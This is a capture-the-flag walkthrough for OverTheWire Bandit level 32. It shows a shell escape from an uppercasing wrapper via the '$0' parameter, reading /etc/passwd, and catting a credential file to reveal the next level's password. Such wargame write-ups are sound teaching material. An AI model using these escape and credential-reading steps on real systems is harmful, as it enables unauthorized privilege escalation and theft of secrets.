Level32Level GoalAfter all this git stuff its time for another escape. Good luck!SolutionThe goal states that this will be an escape, so to find out the shell that is set for bandit32 we can look in the /etc/passwd file. Looking at the file we see in passwd, we can see that it’s a setuid executable owned by bandit33.root@0xCAB: /writeups/overthewire/bandit/level32/$ grep bandit32 /etc/passwd^1000 `bandit32:x:11032:11032:bandit level 32:/home/bandit32:/home/bandit32/uppershell`$ ll /home/bandit32/uppershell^1000 `-rwsr-x--- 1 bandit33 bandit32 15128 Jan 11 19:18 uppershell*`$Logging in as bandit22 drops us in this shell. It seems like everything we type gets uppercased and then passed to sh. Looking at the sh man page we see that there are special parameters built in to sh. These special parameters don’t involve letters, so uppershell can’t capatalize them. If we use the “$$” parameter we can see the PID of the shell, so we know these parameters are being passed to sh. The man page tells us that the “$0” parameter expands to the name of the shell or shell script. Using that causes the name of the shell to be executed by sh, and we get a new shell as bandit33. We can now get the password for bandit33.root@0xCAB: /writeups/overthewire/bandit/level32/`WELCOME TO THE UPPERCASE SHELL`$>> ls -la^1000 `sh: 1: LS: not found`$>> $$^1000 `sh: 1: 3799803: not found``>> $0`$ whoami^1000 `bandit33`$ cat /etc/bandit_pass/bandit33^1000 `odHo63fHiFqcWWJG9rLiLDtPm45KzUKy`$